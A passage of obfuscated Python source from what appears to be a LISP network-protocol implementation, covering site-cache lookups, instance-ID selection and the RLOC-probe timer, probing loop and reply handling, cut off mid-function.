if 47 - 47: OOooOOo * IiII % I1Ii111 . OoOoOO00 - OoooooooOO / OoooooooOO
if 79 - 79: I11i % i11iIiiIii % I1IiiI . OoooooooOO * oO0o . Ii1I
def lisp_process_api_site_cache_entry ( parms ) :
o0OoO0000o = parms [ "instance-id" ]
o0OoO0000o = 0 if ( o0OoO0000o == "" ) else int ( o0OoO0000o )
if 14 - 14: iIii1I11I1II1 / I11i - o0oOOo0O0Ooo / IiII / o0oOOo0O0Ooo . OoO0O00
if 2 - 2: I11i
if 12 - 12: i1IIi . I1Ii111
if 99 - 99: Oo0Ooo / i11iIiiIii
OOo0O0O0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
OOo0O0O0o0 . store_prefix ( parms [ "eid-prefix" ] )
if 81 - 81: Ii1I . i1IIi % iII111i . OoO0O00 % IiII
if 42 - 42: iII111i / Oo0Ooo
if 14 - 14: O0 . Oo0Ooo
if 8 - 8: i11iIiiIii
if 80 - 80: I1ii11iIi11i + Ii1I
O0o00oOOOO00 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
if ( parms . has_key ( "group-prefix" ) ) :
O0o00oOOOO00 . store_prefix ( parms [ "group-prefix" ] )
if 16 - 16: i11iIiiIii * Oo0Ooo
if 76 - 76: iII111i . oO0o - i1IIi
oo00000ooOooO = [ ]
o00Ii = lisp_site_eid_lookup ( OOo0O0O0o0 , O0o00oOOOO00 , False )
if ( o00Ii ) : lisp_gather_site_cache_data ( o00Ii , oo00000ooOooO )
return ( oo00000ooOooO )
if 94 - 94: O0 % iII111i
if 90 - 90: IiII
if 1 - 1: I1ii11iIi11i % OoOoOO00 . I1ii11iIi11i . OoooooooOO % oO0o + Ii1I
if 46 - 46: I1IiiI + OoO0O00 - Oo0Ooo
if 13 - 13: OoOoOO00
if 72 - 72: II111iiii * iII111i . II111iiii + iII111i * IiII
if 90 - 90: oO0o * I1Ii111 / O0
def lisp_get_interface_instance_id ( device , source_eid ) :
II1i = None
if ( lisp_myinterfaces . has_key ( device ) ) :
II1i = lisp_myinterfaces [ device ]
if 15 - 15: o0oOOo0O0Ooo * O0 . OOooOOo / Oo0Ooo
if 28 - 28: OoooooooOO + OoooooooOO
if 27 - 27: I11i . oO0o / OoooooooOO - OoO0O00 . I11i
if 15 - 15: II111iiii * OoO0O00
if 33 - 33: OoooooooOO . o0oOOo0O0Ooo . I1IiiI / I1ii11iIi11i . OoOoOO00
if 58 - 58: Ii1I
if ( II1i == None or II1i . instance_id == None ) :
return ( lisp_default_iid )
if 20 - 20: OOooOOo
if 93 - 93: i1IIi . IiII % O0 * iII111i
if 84 - 84: I11i
if 99 - 99: I1ii11iIi11i
if 78 - 78: I1Ii111 . IiII - OOooOOo
if 93 - 93: iIii1I11I1II1
if 33 - 33: OOooOOo . i1IIi
if 63 - 63: II111iiii . oO0o * IiII
if 73 - 73: iII111i . i1IIi + oO0o + OOooOOo + ooOoO0o - iIii1I11I1II1
o0OoO0000o = II1i . get_instance_id ( )
if ( source_eid == None ) : return ( o0OoO0000o )
if 47 - 47: I11i
oOo0o0OoO = source_eid . instance_id
III1I111i = None
for II1i in lisp_multi_tenant_interfaces :
if ( II1i . device != device ) : continue
O000O0o00o0o = II1i . multi_tenant_eid
source_eid . instance_id = O000O0o00o0o . instance_id
if ( source_eid . is_more_specific ( O000O0o00o0o ) == False ) : continue
if ( III1I111i == None or III1I111i . multi_tenant_eid . mask_len < O000O0o00o0o . mask_len ) :
III1I111i = II1i
if 41 - 41: Ii1I * iII111i % Oo0Ooo
if 61 - 61: OoooooooOO % iII111i - O0
source_eid . instance_id = oOo0o0OoO
if 62 - 62: iIii1I11I1II1
if ( III1I111i == None ) : return ( o0OoO0000o )
return ( III1I111i . get_instance_id ( ) )
if 14 - 14: I1Ii111
if 95 - 95: II111iiii / o0oOOo0O0Ooo * OOooOOo
if 81 - 81: i11iIiiIii / iIii1I11I1II1
if 73 - 73: i11iIiiIii . I1ii11iIi11i * OoOoOO00
if 95 - 95: i1IIi + iIii1I11I1II1 . I1Ii111 / I1Ii111
if 84 - 84: Oo0Ooo . OoO0O00 * IiII
if 95 - 95: OoO0O00
if 100 - 100: II111iiii
if 34 - 34: I11i % OOooOOo - iII111i % II111iiii
def lisp_allow_dynamic_eid ( device , eid ) :
if ( lisp_myinterfaces . has_key ( device ) == False ) : return ( None )
if 14 - 14: I11i * o0oOOo0O0Ooo % II111iiii
II1i = lisp_myinterfaces [ device ]
I1iiI1II = device if II1i . dynamic_eid_device == None else II1i . dynamic_eid_device
if 95 - 95: I1Ii111 * OoooooooOO + iII111i
if 10 - 10: i1IIi - O0 / Oo0Ooo
if ( II1i . does_dynamic_eid_match ( eid ) ) : return ( I1iiI1II )
return ( None )
if 54 - 54: OoO0O00
if 38 - 38: II111iiii + o0oOOo0O0Ooo * I11i + I1Ii111 - II111iiii . OOooOOo
if 38 - 38: I1ii11iIi11i % OOooOOo + iII111i / Oo0Ooo / IiII / oO0o
if 2 - 2: iIii1I11I1II1
if 9 - 9: I1Ii111 / IiII
if 33 - 33: o0oOOo0O0Ooo + oO0o . o0oOOo0O0Ooo . I11i * OoooooooOO + iIii1I11I1II1
if 64 - 64: OoooooooOO . Ii1I
def lisp_start_rloc_probe_timer ( interval , lisp_sockets ) :
global lisp_rloc_probe_timer
if 38 - 38: Oo0Ooo
if ( lisp_rloc_probe_timer != None ) : lisp_rloc_probe_timer . cancel ( )
if 64 - 64: ooOoO0o % i11iIiiIii
I1II1I1Ii1 = lisp_process_rloc_probe_timer
i1I1I11II = threading . Timer ( interval , I1II1I1Ii1 , [ lisp_sockets ] )
lisp_rloc_probe_timer = i1I1I11II
i1I1I11II . start ( )
return
if 54 - 54: i1IIi % iII111i
if 16 - 16: II111iiii - Oo0Ooo
if 44 - 44: OOooOOo / Oo0Ooo - I1ii11iIi11i + I11i . oO0o
if 85 - 85: iIii1I11I1II1 / Ii1I
if 43 - 43: I1IiiI % I1Ii111 - oO0o . II111iiii / iIii1I11I1II1
if 97 - 97: I1Ii111 + I1ii11iIi11i
if 21 - 21: O0 + o0oOOo0O0Ooo * OoooooooOO % IiII % I1ii11iIi11i
def lisp_show_rloc_probe_list ( ) :
lprint ( bold ( "----- RLOC-probe-list -----" , False ) )
for ii1i1I1111ii in lisp_rloc_probe_list :
ooO0O0oo0O = lisp_rloc_probe_list [ ii1i1I1111ii ]
lprint ( "RLOC {}:" . format ( ii1i1I1111ii ) )
for i11iII1IiI , oOo , i11ii in ooO0O0oo0O :
lprint ( " [{}, {}, {}, {}]" . format ( hex ( id ( i11iII1IiI ) ) , oOo . print_prefix ( ) ,
i11ii . print_prefix ( ) , i11iII1IiI . translated_port ) )
if 46 - 46: ooOoO0o / OOooOOo * I1Ii111 % OoOoOO00 . ooOoO0o - i1IIi
if 11 - 11: OoOoOO00 - II111iiii + I1Ii111 + IiII + OOooOOo - ooOoO0o
lprint ( bold ( "---------------------------" , False ) )
return
if 12 - 12: Ii1I - oO0o % I1ii11iIi11i / oO0o
if 14 - 14: OOooOOo * iII111i . IiII + i1IIi % i1IIi
if 11 - 11: I1ii11iIi11i + iIii1I11I1II1 - I1Ii111 * iIii1I11I1II1 * IiII + oO0o
if 6 - 6: I1Ii111 * OOooOOo + i1IIi - Ii1I / oO0o
if 81 - 81: I1Ii111 % oO0o * i1IIi * OoooooooOO / Oo0Ooo
if 70 - 70: I1IiiI
if 35 - 35: i11iIiiIii
if 59 - 59: ooOoO0o . iII111i - II111iiii
if 30 - 30: o0oOOo0O0Ooo % iII111i - i11iIiiIii
def lisp_mark_rlocs_for_other_eids ( eid_list ) :
if 25 - 25: i11iIiiIii + OoOoOO00 + oO0o / Ii1I * Oo0Ooo + Oo0Ooo
if 26 - 26: I1IiiI % I1ii11iIi11i + o0oOOo0O0Ooo / I1ii11iIi11i - I1IiiI
if 55 - 55: OoooooooOO
if 2 - 2: Oo0Ooo + I11i / OOooOOo + OOooOOo
oOo00O , oOo , i11ii = eid_list [ 0 ]
O0O = [ lisp_print_eid_tuple ( oOo , i11ii ) ]
if 13 - 13: OOooOOo / IiII
for oOo00O , oOo , i11ii in eid_list [ 1 : : ] :
oOo00O . state = LISP_RLOC_UNREACH_STATE
oOo00O . last_state_change = lisp_get_timestamp ( )
O0O . append ( lisp_print_eid_tuple ( oOo , i11ii ) )
if 16 - 16: I1Ii111 / OoOoOO00 - I1IiiI / oO0o + OoO0O00
if 38 - 38: O0 * iIii1I11I1II1 - oO0o
IiI1Iiiii1Iii = bold ( "unreachable" , False )
o0O00oo0O = red ( oOo00O . rloc . print_address_no_iid ( ) , False )
if 31 - 31: I1IiiI
for OOo0O0O0o0 in O0O :
oOo = green ( OOo0O0O0o0 , False )
lprint ( "RLOC {} went {} for EID {}" . format ( o0O00oo0O , IiI1Iiiii1Iii , oOo ) )
if 21 - 21: oO0o - IiII
if 61 - 61: o0oOOo0O0Ooo
if 53 - 53: Ii1I / oO0o . I11i
if 62 - 62: O0 + I1ii11iIi11i + Ii1I / i1IIi
if 77 - 77: O0
if 49 - 49: o0oOOo0O0Ooo / i11iIiiIii
for oOo00O , oOo , i11ii in eid_list :
IiiiiII1i = lisp_map_cache . lookup_cache ( oOo , True )
if ( IiiiiII1i ) : lisp_write_ipc_map_cache ( True , IiiiiII1i )
if 36 - 36: II111iiii
return
if 78 - 78: OoO0O00 + iIii1I11I1II1 * i1IIi
if 7 - 7: i11iIiiIii
if 49 - 49: I1IiiI - oO0o % OOooOOo / O0 / II111iiii
if 41 - 41: IiII % II111iiii
if 99 - 99: IiII - O0
if 59 - 59: iII111i % O0 + OOooOOo * ooOoO0o
if 27 - 27: I1Ii111 % i11iIiiIii * I1IiiI
if 19 - 19: OoOoOO00 / o0oOOo0O0Ooo - iII111i / OoO0O00
if 12 - 12: I1ii11iIi11i - I11i * O0 % I1IiiI + O0 - II111iiii
if 13 - 13: iII111i / OOooOOo * i11iIiiIii / oO0o / OoooooooOO
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
lisp_set_exception ( )
if 89 - 89: Ii1I * Oo0Ooo / I1Ii111 * I1ii11iIi11i + O0 * Oo0Ooo
lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
if ( lisp_rloc_probing == False ) : return
if 74 - 74: I11i . I11i
if 74 - 74: OoOoOO00 * ooOoO0o * I1Ii111
if 56 - 56: iIii1I11I1II1 * OoO0O00 - oO0o * Ii1I
if 62 - 62: i1IIi + I11i / OOooOOo - OoooooooOO % i1IIi . I1IiiI
if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
if 13 - 13: O0 * iII111i
if 26 - 26: i1IIi - I1Ii111 - ooOoO0o
if 73 - 73: o0oOOo0O0Ooo . OoooooooOO
if 96 - 96: i1IIi - OOooOOo / I11i % OoOoOO00 - i11iIiiIii % II111iiii
i11111ii11I11 = lisp_get_default_route_next_hops ( )
if 3 - 3: Ii1I % iIii1I11I1II1 - I1Ii111 . oO0o . iII111i / o0oOOo0O0Ooo
lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
if 8 - 8: O0 - I1Ii111
if 82 - 82: iII111i + II111iiii
if 29 - 29: O0 % Ii1I * ooOoO0o % O0
if 83 - 83: oO0o
if 95 - 95: Oo0Ooo * O0 % i1IIi / iII111i + oO0o
OO = 0
OOO0oOooOOo00 = bold ( "RLOC-probe" , False )
for oo0O in lisp_rloc_probe_list . values ( ) :
if 78 - 78: iII111i % i1IIi
if 90 - 90: Ii1I * I11i + iII111i
if 11 - 11: I1ii11iIi11i % IiII + OOooOOo . I1Ii111
if 45 - 45: o0oOOo0O0Ooo / OOooOOo % i1IIi * Ii1I / i11iIiiIii
if 89 - 89: ooOoO0o
O0O00OOoo00 = None
for i1iI1Iii , OOo0O0O0o0 , O0o00oOOOO00 in oo0O :
oo0o00OO = i1iI1Iii . rloc . print_address_no_iid ( )
if 20 - 20: I11i
if 37 - 37: I1Ii111
if 19 - 19: I1ii11iIi11i / OOooOOo . I1IiiI / ooOoO0o + OoO0O00 + i11iIiiIii
if 80 - 80: OoO0O00 . O0 / Ii1I % I1Ii111 / iII111i * I1IiiI
ii1iI1 , iiIiiIi1II1ii , o00oo0 = lisp_allow_gleaning ( OOo0O0O0o0 , None , i1iI1Iii )
if ( ii1iI1 and iiIiiIi1II1ii == False ) :
oOo = green ( OOo0O0O0o0 . print_address ( ) , False )
oo0o00OO += ":{}" . format ( i1iI1Iii . translated_port )
lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( oo0o00OO , False ) , oOo ) )
if 33 - 33: I1IiiI . OoooooooOO - o0oOOo0O0Ooo - i11iIiiIii * ooOoO0o % OOooOOo
continue
if 27 - 27: i11iIiiIii . OoO0O00 * I1ii11iIi11i * I1ii11iIi11i + ooOoO0o / OoO0O00
if 26 - 26: I1IiiI + OoooooooOO * iII111i * iII111i - Ii1I - OOooOOo
if 44 - 44: ooOoO0o % iII111i - o0oOOo0O0Ooo
if 94 - 94: OoooooooOO * iIii1I11I1II1 + OOooOOo % I11i
if 32 - 32: i11iIiiIii % OoOoOO00 % O0 / o0oOOo0O0Ooo + ooOoO0o
if 4 - 4: OoOoOO00 / II111iiii . i1IIi + OOooOOo % II111iiii
if 82 - 82: i11iIiiIii . OoooooooOO % OoOoOO00 * O0 - I1Ii111
if ( i1iI1Iii . down_state ( ) ) : continue
if 78 - 78: OoOoOO00 % Ii1I % OOooOOo % Oo0Ooo % I11i . Ii1I
if 73 - 73: OoooooooOO / i1IIi . iIii1I11I1II1
if 89 - 89: I1Ii111
if 29 - 29: I11i * ooOoO0o - OoooooooOO
if 92 - 92: O0 % i1IIi / OOooOOo - oO0o
if 83 - 83: o0oOOo0O0Ooo . OoO0O00 % iIii1I11I1II1 % OoOoOO00 - i11iIiiIii
if 71 - 71: I1ii11iIi11i - II111iiii / O0 % i1IIi + oO0o
if 73 - 73: OoooooooOO
if 25 - 25: i1IIi . II111iiii . I1Ii111
if 81 - 81: II111iiii + OoOoOO00 * II111iiii / iIii1I11I1II1 - Oo0Ooo % oO0o
if 66 - 66: ooOoO0o % O0 + iIii1I11I1II1 * I1Ii111 - I1Ii111
if ( O0O00OOoo00 ) :
i1iI1Iii . last_rloc_probe_nonce = O0O00OOoo00 . last_rloc_probe_nonce
if 61 - 61: I1ii11iIi11i
if ( O0O00OOoo00 . translated_port == i1iI1Iii . translated_port and O0O00OOoo00 . rloc_name == i1iI1Iii . rloc_name ) :
if 12 - 12: OoO0O00
oOo = green ( lisp_print_eid_tuple ( OOo0O0O0o0 , O0o00oOOOO00 ) , False )
lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( oo0o00OO , False ) , oOo ) )
if 97 - 97: OOooOOo . Oo0Ooo . oO0o * i1IIi
continue
if 7 - 7: Oo0Ooo
if 38 - 38: Oo0Ooo - I1ii11iIi11i
if 19 - 19: Ii1I * OoO0O00 / OoO0O00 . II111iiii % iIii1I11I1II1
iiIIII1I1ii = None
oOo00O = None
while ( True ) :
oOo00O = i1iI1Iii if oOo00O == None else oOo00O . next_rloc
if ( oOo00O == None ) : break
if 61 - 61: I1ii11iIi11i * oO0o % iII111i + IiII + i11iIiiIii * I11i
if 3 - 3: Ii1I
if 71 - 71: iIii1I11I1II1 . OOooOOo / I11i / i1IIi
if 69 - 69: i1IIi / iII111i + Ii1I + I11i + IiII
if 86 - 86: Oo0Ooo
if ( oOo00O . rloc_next_hop != None ) :
if ( oOo00O . rloc_next_hop not in i11111ii11I11 ) :
if ( oOo00O . up_state ( ) ) :
OooOOOoOoo0O0 , IiI1Ii = oOo00O . rloc_next_hop
oOo00O . state = LISP_RLOC_UNREACH_STATE
oOo00O . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( oOo00O . rloc , False )
if 97 - 97: I1IiiI
IiI1Iiiii1Iii = bold ( "unreachable" , False )
lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( IiI1Ii , OooOOOoOoo0O0 ,
red ( oo0o00OO , False ) , IiI1Iiiii1Iii ) )
continue
if 91 - 91: ooOoO0o / oO0o * OOooOOo . II111iiii - I11i - I11i
if 5 - 5: O0 + OoooooooOO + i11iIiiIii * Oo0Ooo * OoOoOO00 . oO0o
if 6 - 6: OoO0O00 % Oo0Ooo % I1IiiI % o0oOOo0O0Ooo % O0 % Oo0Ooo
if 94 - 94: I11i . i1IIi / II111iiii + OOooOOo
if 64 - 64: I1IiiI % ooOoO0o
if 72 - 72: O0 * II111iiii % OoO0O00 - I1IiiI * OOooOOo
I1IIII = oOo00O . last_rloc_probe
O0o0O0OoOOoO = 0 if I1IIII == None else time . time ( ) - I1IIII
if ( oOo00O . unreach_state ( ) and O0o0O0OoOOoO < LISP_RLOC_PROBE_INTERVAL ) :
lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( oo0o00OO , False ) ) )
if 66 - 66: iIii1I11I1II1 - Oo0Ooo % OoooooooOO % O0
continue
if 33 - 33: I1Ii111 / II111iiii / II111iiii
if 15 - 15: O0 * OoooooooOO - O0 + OoooooooOO
if 40 - 40: O0 * OoooooooOO - oO0o + iIii1I11I1II1 * OOooOOo + I1ii11iIi11i
if 43 - 43: OoO0O00 . O0
if 36 - 36: I11i
if 28 - 28: ooOoO0o
Oo0ooO0O0o00o = lisp_get_echo_nonce ( None , oo0o00OO )
if ( Oo0ooO0O0o00o and Oo0ooO0O0o00o . request_nonce_timeout ( ) ) :
oOo00O . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
oOo00O . last_state_change = lisp_get_timestamp ( )
IiI1Iiiii1Iii = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( oo0o00OO , False ) , IiI1Iiiii1Iii ) )
if 1 - 1: IiII / OoO0O00 * oO0o - I1Ii111 . OoOoOO00
lisp_update_rtr_updown ( oOo00O . rloc , False )
continue
if 85 - 85: i11iIiiIii + OoOoOO00
if 4 - 4: OOooOOo . OoO0O00 * II111iiii + OoO0O00 % Oo0Ooo
if 60 - 60: OOooOOo . Ii1I
if 13 - 13: i1IIi . iII111i / OoOoOO00 . I1Ii111
if 65 - 65: oO0o % I1Ii111 % OoO0O00 . iIii1I11I1II1
if 38 - 38: IiII / I11i / IiII * iII111i
if ( Oo0ooO0O0o00o and Oo0ooO0O0o00o . recently_echoed ( ) ) :
lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( oo0o00OO , False ) ) )
if 30 - 30: oO0o
continue
if 30 - 30: IiII / OoO0O00
if 89 - 89: oO0o . OoOoOO00 . IiII / iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00
if 86 - 86: OoooooooOO - iIii1I11I1II1 . OoO0O00 * Ii1I / I1Ii111 + I1Ii111
if 52 - 52: iIii1I11I1II1 % OoO0O00 - IiII % i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: Oo0Ooo - OOooOOo . i1IIi * OoOoOO00 / I11i / o0oOOo0O0Ooo
if 54 - 54: OoOoOO00 / i1IIi + OOooOOo - I1ii11iIi11i - I1IiiI * I1Ii111
if ( oOo00O . last_rloc_probe != None ) :
I1IIII = oOo00O . last_rloc_probe_reply
if ( I1IIII == None ) : I1IIII = 0
O0o0O0OoOOoO = time . time ( ) - I1IIII
if ( oOo00O . up_state ( ) and O0o0O0OoOOoO >= LISP_RLOC_PROBE_REPLY_WAIT ) :
if 91 - 91: OoooooooOO * OoooooooOO
oOo00O . state = LISP_RLOC_UNREACH_STATE
oOo00O . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( oOo00O . rloc , False )
IiI1Iiiii1Iii = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, probe it" . format ( red ( oo0o00OO , False ) , IiI1Iiiii1Iii ) )
if 27 - 27: ooOoO0o / I1IiiI * I1ii11iIi11i . o0oOOo0O0Ooo
if 30 - 30: o0oOOo0O0Ooo / i11iIiiIii
lisp_mark_rlocs_for_other_eids ( oo0O )
if 33 - 33: OOooOOo % OoooooooOO
if 98 - 98: Ii1I
if 38 - 38: ooOoO0o - iII111i * OOooOOo % I1ii11iIi11i + Oo0Ooo
oOo00O . last_rloc_probe = lisp_get_timestamp ( )
if 95 - 95: iIii1I11I1II1 / O0 % O0
o0O0o00ooOOOO0 = "" if oOo00O . unreach_state ( ) == False else " unreachable"
if 18 - 18: OoO0O00 * ooOoO0o
if 32 - 32: oO0o . OoooooooOO - o0oOOo0O0Ooo + II111iiii
if 4 - 4: OOooOOo * I1IiiI - I11i - I11i
if 67 - 67: I1IiiI
if 32 - 32: oO0o * i11iIiiIii - I11i % Oo0Ooo * I1ii11iIi11i
if 79 - 79: II111iiii / Oo0Ooo / I1ii11iIi11i
if 30 - 30: I11i . o0oOOo0O0Ooo / II111iiii
ooooOOO0OoO = ""
IiI1Ii = None
if ( oOo00O . rloc_next_hop != None ) :
OooOOOoOoo0O0 , IiI1Ii = oOo00O . rloc_next_hop
lisp_install_host_route ( oo0o00OO , IiI1Ii , True )
ooooOOO0OoO = ", send on nh {}({})" . format ( IiI1Ii , OooOOOoOoo0O0 )
if 47 - 47: I1IiiI + Oo0Ooo
if 78 - 78: i1IIi / I1ii11iIi11i % ooOoO0o * OoO0O00
if 10 - 10: i1IIi % ooOoO0o / iII111i
if 98 - 98: IiII / o0oOOo0O0Ooo - i1IIi - OOooOOo
if 65 - 65: Ii1I + OoOoOO00 * Oo0Ooo . O0 . IiII
i1i1I1I1 = oOo00O . print_rloc_probe_rtt ( )
IiiIII1IIiI1iii = oo0o00OO
if ( oOo00O . translated_port != 0 ) :
IiiIII1IIiI1iii += ":{}" . format ( oOo00O . translated_port )
if 19 - 19: iII111i + OOooOOo
IiiIII1IIiI1iii = red ( IiiIII1IIiI1iii , False )
if ( oOo00O . rloc_name != None ) :
IiiIII1IIiI1iii += " (" + blue ( oOo00O . rloc_name , False ) + ")"
if 65 - 65: I1ii11iIi11i . OoooooooOO + Oo0Ooo * Ii1I
lprint ( "Send {}{} {}, last rtt: {}{}" . format ( OOO0oOooOOo00 , o0O0o00ooOOOO0 ,
IiiIII1IIiI1iii , i1i1I1I1 , ooooOOO0OoO ) )
if 27 - 27: Oo0Ooo % i11iIiiIii
if 48 - 48: IiII
if 74 - 74: Oo0Ooo
if 75 - 75: IiII + OOooOOo
if 92 - 92: OoOoOO00
if 75 - 75: Oo0Ooo % IiII + II111iiii + oO0o
if 35 - 35: I1ii11iIi11i - oO0o - O0 / iII111i % IiII
if 10 - 10: OOooOOo + oO0o - I1Ii111 . I1IiiI
if ( oOo00O . rloc_next_hop != None ) :
iiIIII1I1ii = lisp_get_host_route_next_hop ( oo0o00OO )
if ( iiIIII1I1ii ) : lisp_install_host_route ( oo0o00OO , iiIIII1I1ii , False )
if 11 - 11: I1ii11iIi11i . I1Ii111 / o0oOOo0O0Ooo + IiII
if 73 - 73: OoO0O00 . i11iIiiIii * OoO0O00 * i1IIi + I11i
if 27 - 27: i11iIiiIii / OoOoOO00 % O0 / II111iiii . I11i - ooOoO0o
if 54 - 54: oO0o * II111iiii
if 79 - 79: o0oOOo0O0Ooo . ooOoO0o . Oo0Ooo * OoooooooOO
if 98 - 98: ooOoO0o
if ( oOo00O . rloc . is_null ( ) ) :
oOo00O . rloc . copy_address ( i1iI1Iii . rloc )
if 73 - 73: I1Ii111
if 97 - 97: OoO0O00 * Ii1I + Oo0Ooo
if 83 - 83: II111iiii - Oo0Ooo % II111iiii * o0oOOo0O0Ooo
if 51 - 51: iII111i * iIii1I11I1II1 % Ii1I * Ii1I + i11iIiiIii . OoooooooOO
if 54 - 54: i11iIiiIii . iIii1I11I1II1 * iIii1I11I1II1 + Ii1I % I11i - OoO0O00
O00oOOOOoOO = None if ( O0o00oOOOO00 . is_null ( ) ) else OOo0O0O0o0
I11iIii1i11 = OOo0O0O0o0 if ( O0o00oOOOO00 . is_null ( ) ) else O0o00oOOOO00
lisp_send_map_request ( lisp_sockets , 0 , O00oOOOOoOO , I11iIii1i11 , oOo00O )
O0O00OOoo00 = i1iI1Iii
if 67 - 67: OoO0O00
if 37 - 37: o0oOOo0O0Ooo + I11i - Ii1I - Ii1I * OoO0O00 % i11iIiiIii
if 98 - 98: I1Ii111 % IiII % i1IIi * OOooOOo . iIii1I11I1II1
if 60 - 60: iII111i . Ii1I / I1IiiI
if ( IiI1Ii ) : lisp_install_host_route ( oo0o00OO , IiI1Ii , False )
if 92 - 92: OoooooooOO % II111iiii + I1ii11iIi11i
if 93 - 93: OoooooooOO . I1ii11iIi11i
if 100 - 100: iIii1I11I1II1 . i1IIi / OOooOOo * i11iIiiIii
if 93 - 93: I1ii11iIi11i
if 45 - 45: I1ii11iIi11i * I1ii11iIi11i
if ( iiIIII1I1ii ) : lisp_install_host_route ( oo0o00OO , iiIIII1I1ii , True )
if 31 - 31: OoO0O00 - OOooOOo . iII111i * I1Ii111 * iII111i + I1ii11iIi11i
if 5 - 5: Oo0Ooo . I1Ii111
if 77 - 77: i11iIiiIii / I1Ii111 / I1ii11iIi11i % oO0o
if 83 - 83: Ii1I % iIii1I11I1II1 / I1ii11iIi11i + I11i
OO += 1
if ( ( OO % 10 ) == 0 ) : time . sleep ( 0.020 )
if 23 - 23: iIii1I11I1II1 - I1IiiI
if 51 - 51: OoooooooOO / IiII / I1ii11iIi11i . Oo0Ooo - o0oOOo0O0Ooo * OoooooooOO
if 40 - 40: OoO0O00 / IiII . O0 / I1IiiI + OoO0O00 . o0oOOo0O0Ooo
lprint ( "---------- End RLOC Probing ----------" )
return
if 25 - 25: ooOoO0o * I1Ii111 * oO0o
if 64 - 64: Ii1I / I1ii11iIi11i
if 30 - 30: OoooooooOO + O0 / I1ii11iIi11i * o0oOOo0O0Ooo
if 11 - 11: O0 + OoO0O00 - Oo0Ooo - Oo0Ooo . i11iIiiIii
if 15 - 15: Ii1I % i11iIiiIii / OoOoOO00
if 85 - 85: ooOoO0o . i1IIi / iII111i % iIii1I11I1II1 / II111iiii / I1Ii111
if 60 - 60: iIii1I11I1II1 - iIii1I11I1II1 . I11i
if 55 - 55: OoO0O00
def lisp_update_rtr_updown ( rtr , updown ) :
global lisp_ipc_socket
if 87 - 87: Ii1I - iII111i / O0 - o0oOOo0O0Ooo - iIii1I11I1II1 % Ii1I
if 47 - 47: iII111i * I1Ii111 % o0oOOo0O0Ooo / OoOoOO00 / OoO0O00 % OoO0O00
if 43 - 43: Oo0Ooo
if 34 - 34: OoO0O00 . i1IIi + IiII * IiII
if ( lisp_i_am_itr == False ) : return
if 76 - 76: OOooOOo
if 54 - 54: O0 * II111iiii * OOooOOo
if 44 - 44: I1IiiI
if 66 - 66: o0oOOo0O0Ooo
if 40 - 40: OOooOOo * Ii1I
if ( lisp_register_all_rtrs ) : return
if 38 - 38: ooOoO0o
iiI111I = rtr . print_address_no_iid ( )
if 22 - 22: i11iIiiIii - Ii1I + O0 - I1ii11iIi11i . Oo0Ooo
if 33 - 33: O0
if 30 - 30: II111iiii * OoOoOO00 - OoO0O00 * OOooOOo / I11i
if 77 - 77: Oo0Ooo
if 1 - 1: O0 + OoO0O00 . i11iIiiIii + I1Ii111 - OoO0O00 - IiII
if ( lisp_rtr_list . has_key ( iiI111I ) == False ) : return
if 1 - 1: I1ii11iIi11i / i1IIi . I1IiiI / Ii1I
updown = "up" if updown else "down"
lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
red ( iiI111I , False ) , bold ( updown , False ) ) )
if 19 - 19: iIii1I11I1II1 / Oo0Ooo . O0 - Oo0Ooo
if 74 - 74: I1ii11iIi11i * OoooooooOO . iII111i
if 45 - 45: I1IiiI - IiII % ooOoO0o - IiII . Oo0Ooo - o0oOOo0O0Ooo
if 27 - 27: iII111i
OoOO0o00OOO0o = "rtr%{}%{}" . format ( iiI111I , updown )
OoOO0o00OOO0o = lisp_command_ipc ( OoOO0o00OOO0o , "lisp-itr" )
lisp_ipc ( OoOO0o00OOO0o , lisp_ipc_socket , "lisp-etr" )
return
if 64 - 64: iIii1I11I1II1 - OOooOOo . iII111i % o0oOOo0O0Ooo / II111iiii % OoooooooOO
if 87 - 87: OoooooooOO
if 70 - 70: o0oOOo0O0Ooo % OoooooooOO % I1IiiI . OoOoOO00 * I1IiiI - ooOoO0o
if 92 - 92: I1IiiI . I11i
if 66 - 66: I1Ii111 / I11i / OoooooooOO % OoOoOO00 . oO0o * iII111i
if 34 - 34: I1ii11iIi11i * I1ii11iIi11i % I11i / OOooOOo % oO0o . OoOoOO00
if 25 - 25: I1ii11iIi11i / I11i + i1IIi . I1IiiI + ooOoO0o
def lisp_process_rloc_probe_reply ( rloc , source , port , nonce , hop_count , ttl ) :
OOO0oOooOOo00 = bold ( "RLOC-probe reply" , False )
i1Iii11 = rloc . print_address_no_iid ( )
iiiI1 = source . print_address_no_iid ( )
iiiooO0 = lisp_rloc_probe_list
if 18 - 18: I1ii11iIi11i - iIii1I11I1II1 + i1IIi * I1Ii111
if 12 - 12: I1ii11iIi11i + I1Ii111 + i1IIi * o0oOOo0O0Ooo - i11iIiiIii
if 92 - 92: I1Ii111 - I1IiiI + Ii1I / iII111i % OOooOOo
if 32 - 32: i1IIi . iII111i - Ii1I % iII111i % II111iiii - oO0o
if 36 - 36: OoooooooOO * OoooooooOO . ooOoO0o . O0
if 5 - 5: I11i % I1IiiI - OoO0O00 . Oo0Ooo
IiiIIi1 = i1Iii11
if ( iiiooO0 . has_key ( IiiIIi1 ) == False ) :
IiiIIi1 += ":" + str ( port )
if ( iiiooO0 . has_key ( IiiIIi1 ) == False ) :
IiiIIi1 = iiiI1
if ( iiiooO0 . has_key ( IiiIIi1 ) == False ) :
